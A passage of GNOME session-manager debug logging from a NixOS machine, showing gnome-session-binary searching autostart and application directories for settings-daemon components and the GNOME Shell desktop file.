machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.UsbProtection.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Wacom.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Wacom.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.XSettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.XSettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Done checking required components
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Adding required components
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.Shell.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/share/applications/org.gnome.Shell.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/share/applications/org.gnome.Shell.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App1 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.Shell.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.A11ySettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
